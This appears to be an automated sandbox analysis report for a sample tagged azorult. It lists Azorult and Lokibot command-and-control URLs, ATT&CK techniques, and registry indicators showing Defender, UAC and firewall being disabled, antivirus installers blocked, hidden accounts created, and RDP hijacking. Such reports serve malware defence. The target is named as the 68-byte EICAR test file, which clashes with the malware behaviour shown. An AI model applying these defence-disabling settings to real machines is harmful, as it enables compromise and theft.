azorult | 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f

Analysis

max time kernel
572s
max time network
573s
platform
windows10-2004_x64
resource
win10v2004-20250313-de
resource tags

arch:x64arch:x86image:win10v2004-20250313-delocale:de-deos:windows10-2004-x64systemwindows
submitted
22/03/2025, 21:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EICAR.txt
Size

68B
MD5

44d88612fea8a8f36de82e1278abb02f
SHA1

3395856ce81f2b7382dee72602f798b642f14140
SHA256

275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f
SHA512

cc805d5fab1fd71a4ab352a9c533e65fb2d5b885518f4e565e68847223b8e6b85cb48f3afad842726d99239c9e36505c64b0dc9a061d9e507d833277ada336ab

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Extracted

Family

lokibot

http://blesblochem.com/two/gates1/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3988	1936	sc.exe	222

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 5 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
2440	net1.exe
1508	net.exe

Blocklisted process makes network request 38 IoCs

flow	pid	Process
266	1936	WINWORD.EXE
268	1936	WINWORD.EXE
270	1936	WINWORD.EXE
272	1936	WINWORD.EXE
290	1936	WINWORD.EXE
304	1936	WINWORD.EXE
306	1936	WINWORD.EXE
307	1936	WINWORD.EXE
308	1936	WINWORD.EXE
309	1936	WINWORD.EXE
310	1936	WINWORD.EXE
311	1936	WINWORD.EXE
312	1936	WINWORD.EXE
313	1936	WINWORD.EXE
314	1936	WINWORD.EXE
315	1936	WINWORD.EXE
316	1936	WINWORD.EXE
317	1936	WINWORD.EXE
318	1936	WINWORD.EXE
334	1936	WINWORD.EXE
290	1936	WINWORD.EXE
337	1936	WINWORD.EXE
266	1936	cmd.exe
272	1936	cmd.exe
304	1936	cmd.exe
318	1936	cmd.exe
315	1936	cmd.exe
313	1936	cmd.exe
314	1936	cmd.exe
317	1936	cmd.exe
312	1936	cmd.exe
316	1936	cmd.exe
308	1936	cmd.exe
309	1936	cmd.exe
307	1936	cmd.exe
306	1936	cmd.exe
311	1936	cmd.exe
310	1936	cmd.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
7100	netsh.exe
6712	netsh.exe
6204	netsh.exe
6196	netsh.exe
2764	netsh.exe
3360	netsh.exe
3348	netsh.exe
6320	netsh.exe
6832	netsh.exe
3436	netsh.exe
6448	netsh.exe
868	netsh.exe
7104	netsh.exe
6816	netsh.exe
3912	netsh.exe
2964	netsh.exe
6704	netsh.exe
6200	netsh.exe
1244	netsh.exe
5652	netsh.exe
4992	netsh.exe
6924	netsh.exe
7108	netsh.exe

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

resource	yara_rule
behavioral1/files/0x00080000000243d0-1304.dat	office_macro_on_action

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
7120	attrib.exe
5360	attrib.exe
6896	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00070000000243b4-1198.dat	acprotect
behavioral1/files/0x00070000000243b3-1197.dat	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x00070000000243b1-1155.dat	aspack_v212_v242
behavioral1/files/0x00070000000243b0-1199.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	Azorult.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	FreeYoutubeDownloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	Uninstall.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	Free YouTube Downloader.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat	xcopy.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat	xcopy.exe

Executes dropped EXE 64 IoCs

pid	Process
1072	Lokibot.exe
4200	Azorult.exe
3680	wini.exe
3356	winit.exe
1936	rutserv.exe
6036	rutserv.exe
1964	rutserv.exe
5076	rutserv.exe
3548	rfusclient.exe
1344	rfusclient.exe
2188	cheat.exe
3700	taskhost.exe
4580	ink.exe
412	P.exe
2928	rfusclient.exe
532	Lokibot.exe
5728	R8.exe
6604	winlog.exe
3356	winlogon.exe
6792	Rar.exe
6492	RDPWInst.exe
3156	RDPWInst.exe
6164	taskhostw.exe
3728	winlogon.exe
4648	taskhostw.exe
6708	taskhostw.exe
3160	taskhostw.exe
1352	ArcticBomb.exe
1560	ArcticBomb.exe
4708	ArcticBomb.exe
6192	ArcticBomb.exe
6208	ArcticBomb.exe
6416	taskhostw.exe
6248	FreeYoutubeDownloader.exe
2584	Free YouTube Downloader.exe
3332	taskhostw.exe
4516	taskhostw.exe
6088	Zika.exe
5016	svchost.exe
2120	taskhost.exe
1848	svchost.exe
6004	taskhost.exe
1148	svchost.exe
6288	taskhost.exe
2632	svchost.exe
648	Box.exe
416	taskhost.exe
6476	svchost.exe
4280	svchost.exe
5500	taskhost.exe
4656	svchost.exe
6816	taskhost.exe
2384	svchost.exe
3604	taskhost.exe
1656	svchost.exe
1044	taskhost.exe
812	svchost.exe
312	taskhost.exe
4392	svchost.exe
7116	taskhost.exe
4816	taskhostw.exe
1460	Box.exe
3568	Uninstall.exe
6352	Uninstall.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6572	icacls.exe
6456	icacls.exe
6476	icacls.exe
6280	icacls.exe
6424	icacls.exe
6960	icacls.exe
7140	icacls.exe
6620	icacls.exe
6796	icacls.exe
6724	icacls.exe
6460	icacls.exe
7088	icacls.exe
6628	icacls.exe
3220	icacls.exe
6348	icacls.exe
6956	icacls.exe
7032	icacls.exe
7124	icacls.exe
7052	icacls.exe
6816	icacls.exe
5472	icacls.exe
6452	icacls.exe
6636	icacls.exe
5376	icacls.exe
6632	icacls.exe
6160	icacls.exe
5436	icacls.exe
6208	icacls.exe
3544	icacls.exe
6832	icacls.exe
5360	icacls.exe
6328	icacls.exe
1628	icacls.exe
6928	icacls.exe
1424	icacls.exe
6816	icacls.exe
6400	icacls.exe
5896	icacls.exe
7108	icacls.exe
6920	icacls.exe
6608	icacls.exe
7036	icacls.exe
7004	icacls.exe
1736	icacls.exe
4936	icacls.exe
5608	icacls.exe
6680	icacls.exe
1720	icacls.exe
6140	icacls.exe
5472	icacls.exe
4572	icacls.exe
2088	icacls.exe
6192	icacls.exe
7036	icacls.exe
6300	icacls.exe
6996	icacls.exe
1240	icacls.exe
2068	icacls.exe
7140	icacls.exe
6936	icacls.exe
6572	icacls.exe
6728	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/1072-718-0x0000000002A40000-0x0000000002A54000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Lokibot.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	Lokibot.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Lokibot.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe"	FreeYoutubeDownloader.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6576	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
202	raw.githubusercontent.com
249	raw.githubusercontent.com
294	raw.githubusercontent.com
300	raw.githubusercontent.com
295	raw.githubusercontent.com
375	raw.githubusercontent.com
403	raw.githubusercontent.com
321	iplogger.org
322	iplogger.org
376	raw.githubusercontent.com
402	raw.githubusercontent.com
203	raw.githubusercontent.com
204	raw.githubusercontent.com
205	raw.githubusercontent.com
377	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
276	ip-api.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000800000002439e-1037.dat	autoit_exe
behavioral1/files/0x00070000000243b2-1111.dat	autoit_exe
behavioral1/files/0x00070000000243bc-1229.dat	autoit_exe
behavioral1/memory/3728-1668-0x0000000000A30000-0x0000000000B1C000-memory.dmp	autoit_exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1072 set thread context of 532	1072	Lokibot.exe	125

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000243b4-1198.dat	upx
behavioral1/files/0x00070000000243b3-1197.dat	upx
behavioral1/files/0x000800000002440e-1581.dat	upx
behavioral1/memory/3356-1586-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3356-1631-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x0008000000024409-1661.dat	upx
behavioral1/memory/3728-1666-0x0000000000A30000-0x0000000000B1C000-memory.dmp	upx
behavioral1/memory/3728-1668-0x0000000000A30000-0x0000000000B1C000-memory.dmp	upx
behavioral1/files/0x0008000000024456-2487.dat	upx
behavioral1/memory/1352-2501-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/1352-2503-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/1560-2515-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/6208-2554-0x0000000000400000-0x0000000000454000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\7-Zip\7zFM.dll.sys.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe\:Zone.Identifier:$DATA	Zika.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.dll.sys.exe	Zika.exe
File created	C:\Program Files\7-Zip\7zG.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\sets.json	msedge.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	svchost.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\7-Zip\7z.dll.sys.exe	Zika.exe
File created	C:\Program Files\7-Zip\7zG.dll.sys.exe	Zika.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	Zika.exe
File created	C:\Program Files\7-Zip\Uninstall.dll.sys.exe	Zika.exe
File created	C:\Program Files\7-Zip\Uninstall.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.dll.sys.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe\:Zone.Identifier:$DATA	Zika.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.dll.sys.exe	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.dll.sys.exe	Zika.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll.sys.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Zika.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File created	C:\Program Files\7-Zip\7zFM.exe	Zika.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	Zika.exe
File created	C:\Program Files\7-Zip\Uninstall.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.dll.sys.exe	Zika.exe
File created	C:\Program Files\7-Zip\7z.exe\:Zone.Identifier:$DATA	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.dll.sys.exe	Zika.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\LICENSE	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\manifest.fingerprint	msedge.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\7zG.dll.sys.exe	Zika.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.dll.sys.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe\:Zone.Identifier:$DATA	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.dll.sys.exe	Zika.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\_metadata\verified_contents.json	msedge.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe	Zika.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\manifest.json	msedge.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.dll.sys.exe	Zika.exe
File created	C:\Program Files\7-Zip\7z.exe	Zika.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	Zika.exe
File created	C:\Program Files\7-Zip\7zG.exe	Zika.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Zika.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.dll.sys.exe	Zika.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe	FreeYoutubeDownloader.exe
File created	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini	FreeYoutubeDownloader.exe
File created	C:\Windows\notepad.dll.sys.exe	Zika.exe
File opened for modification	C:\Windows\notepad.dll.sys.exe	Zika.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1628	sc.exe
